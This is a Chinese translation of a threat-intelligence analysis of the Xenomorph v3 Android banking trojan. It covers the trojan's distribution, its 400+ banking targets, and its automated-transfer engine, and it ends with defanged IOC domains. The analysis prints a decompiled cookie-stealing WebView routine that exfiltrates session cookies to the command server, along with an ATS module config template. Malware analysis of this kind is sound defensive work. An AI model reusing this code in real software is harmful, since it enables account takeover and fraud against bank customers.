去年,ThreatFabric 發現移動端的犯罪分子有了極大的調整。越來越多的犯罪分子開始關注手機銀行領域,并且由粗放式的攻擊轉變為更精細化的、更專業化的攻擊。
Hadoken 團夥開發的移動端惡意軟體在整個 2022 年都持續活躍,而攻擊者本人也在 2022 年 5 月顯身表示擁有惡意軟體的所有權。
地下論壇廣告
該團夥的主要産品就是 Xenomorph 銀行木馬,最早在 2022 年 2 月被發現。該惡意軟體家族持續活躍,但由于其攻擊規模較小,從總體數量來看與其他惡意軟體家族不能相提并論。
Xenomorph 的主要特點就是“快打快收”,通過 GymDrop 或者 Zombinder 進行短期快速分發。但最近研究人員發現的新變種 Xenomorph.C,可能要改變這一現狀。
該版本的惡意軟體為已經功能很完善的銀行木馬又增加了許多新功能。最為重要的就是引入了由輔助服務支撐的運作時引擎,通過該引擎實作完整的 ATS 架構。憑借這一更新,Xenomorph 完全吃透自動化欺詐鍊條,使其成為現如今最先進、最危險的安卓銀行木馬之一。
研究人員發現,Xenomorph 的攻擊目标超過 400 家銀行與各個類型的金融機構,甚至包括幾個加密貨币錢包。與之前的變種相比,攻擊目标數量增長了六倍以上。
攻擊者還為該銀行木馬開發了專用的廣告網站,這表明攻擊者有進入惡意軟體即服務(MaaS)進行大規模分發的意圖。
專用廣告網站
分發
測試階段
研究人員發現了部分測試階段的樣本檔案,此時攻擊者利用 Discord 進行分發。
濫用 Discord 進行分發
Discord 這種服務使用廣泛且非常穩定,注冊和使用都是免費的。最重要的是,安全服務不太可能将這些域名标記為可疑。研究人員認為此時可能并不用于分發,而隻是用于檔案共享。
實際分發
Xenomorph 的第一個變種由 GymDrop 在 2022 年 2 月開始分發,後來又嘗試了 BugDrop 與 Zombinder。分析時,Xenomorph v3 由 Zombinder 應用程式分發,僞裝成一個貨币轉換工具。
通過 Zombinder 進行分發
由于 Zombinder 的營運方已經宣布停止服務,未來 Xenomorph 可能還會轉變分發方式。
攻擊目标
2022 年,Xenomorph 特别關注西班牙、葡萄牙和意大利。在最近的攻擊中又新增了比利時與加拿大,以及部分加密貨币錢包。
研究人員發現帶有 xeno3-test 标簽的樣本檔案中,包含超過 400 個目标機構的裡欸包,這是之前樣本的六倍多。
攻擊目标排行
根據标簽推測,可能是測試版本的惡意樣本,購買 MaaS 服務的使用者可以在其中自由選擇攻擊目标。
攻擊能力更新
2022 年 2 月時,Xenomorph 第一個變種尚且缺少大量的功能。2022 年 6 月,研究人員發現了新版本的 Xenomorph。新版本對代碼進行了全面重構,引入了子產品化的設計增加易用性。也是這時,Xenomorph 開始嘗試引入由輔助服務支撐的運作時引擎,以便支援遠端操作。
在 Xenomorph.C 變種中,犯罪分子增加了對完整 ATS 架構的支援,該引擎被攻擊者命名為 RUM 引擎。
以下是 Xenomorph V3 支援的所有指令,新增指令加粗顯示:
全部指令清單
ATS 架構
如前所述,ATS 可以幫助犯罪分子在失陷主機上自動完成欺詐交易。該技術能夠支援自動提取憑據、賬戶餘額、啟動交易、擷取雙因子認證 Token 并完成資金轉賬,完全無需人工操作。
相關資訊通過 JSON 格式接收,示例如下所示:
{
"module": "<MODULE_NAME>",
"version": 1,
"parameters": [...], // LIST OF PARAMETERS
"requires": [...], // LIST OF REQUIRED CONDITIONS
"triggerConditions": [...], // LIST OF TRIGGER CONDITIONS
"terminator": {...}, // IS TERMINATOR ENABLED
"operations": [...] // LIST OF OPERATIONS TO BE EXECUTED (ATS)
} Xenomorph 開發的 RUM 引擎相當優秀,還支援條件執行與動作優先級排序。接下來以從 Google 身份驗證器中提取 MFA 代碼為例,講解該引擎的功能。
許多銀行正在慢慢放棄使用短信來進行多因子認證,而使用身份驗證器來作為替代。但此類應用程式通常和進行交易的應用程式都在同一台裝置上,這就為攻擊者的欺詐交易提供了可乘之機。
隻要惡意軟體啟動身份驗證器應用程式,就會觸發代碼收集子產品。而觸發條件配置十分靈活,如下所示:
ATS 觸發條件
RUM 引擎提供了大量可自定義的選項,包括各種邏輯運算符。這讓犯罪分子能夠在各種情況下遊刃有餘地進行應對,進而提高每次的感染成功率。
惡意軟體會提取遵循特定結構的代碼,例如兩組三位數字的身份驗證碼:
竊取身份驗證碼
這隻是 ATS 的冰山一角,完整的動作清單如下所示:
全部動作清單
利用這些基礎的動作,攻擊者可以很容易地建立一個腳本來提取賬戶餘額等資訊,完整欺詐交易。
竊取 Cookie
Xenomorph 的最新版本還新增了竊取 Cookie 的功能。最初是 SOVA 銀行木馬在 2021 年 9 月引入該功能,後續各個惡意軟體也不斷在模仿。
Xenomorph 啟動啟用 JavaScript 接口的浏覽器,惡意軟體使用此浏覽器向受害者顯示目标頁面,誘騙使用者登入後竊取 Cookie。
Cookie 竊取
使用者成功登入後,浏覽器将使用 Android CookieManager 提取 Cookie 并回傳給 C&C 伺服器。從惡意軟體控制的浏覽器中擷取 Cookie 的代碼如下所示:
WebView webView0 = new WebView(this);
this.wv = webView0;
webView0.getSettings().setJavaScriptEnabled(true);
this.wv.setWebViewClient(new WebViewClient() {
@Override // android.webkit.WebViewClient
public void onPageFinished(WebView webView0, String s) {
String s1 = CookieManager.getInstance().getCookie(s);
String[] arr_s = CookieManager.getInstance().getCookie(s).replace(";", "").split(" ");
if(s1.contains("sessionid")) {
try {
JSONObject jSONObject0 = new JSONObject();
for(int v = 0; v < arr_s.length; ++v) {
String[] arr_s1 = arr_s[v].split("=");
jSONObject0.put(arr_s1[0], arr_s1[1]);
new StringBuilder().append("cookie is = ").append(jSONObject0).toString();
}
UtilGlobal.sendCookies(jSONObject0.toString());
}
catch(Exception exception0) {
UtilGlobal.sendCookies("cookiesGrabbingFailed");
new StringBuilder().append("Cookie Grabber Error: ").append(exception0.getMessage()).toString();
}
return;
}
}
});
this.wv.addJavascriptInterface(new WebAppInterface(this), "Android");
this.wv.loadUrl("$rstr[CURD]");
this.setContentView(this.wv); 結論
浮出水面的 Xenomorph 再一次證明了攻擊者正在将注意力轉移到移動惡意軟體上。最新版本的 Xenomorph 包含了對其之前版本的重大改進,增加了 ATS 功能進一步提升了該家族的威脅級别。
從感染到資料洩露,Xenomorph v3 能夠執行完整的欺詐鍊。營運 Xenomorph 的攻擊者也在積極宣傳該惡意軟體,非常想要擴大該惡意軟體的影響範圍。研究人員預計 Xenomorph 惡意軟體的數量還會增長,可能通過 Google Play 再次分發。
IOC
team[.]mi1kyway.tech
vldeolan[.]com
cofi[.]hk
dedeperesere[.]xyz
inj.had0[.]live
jobviewer[.]co
翻譯自:https://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html
from https://www.freebuf.com/articles/network/360461.html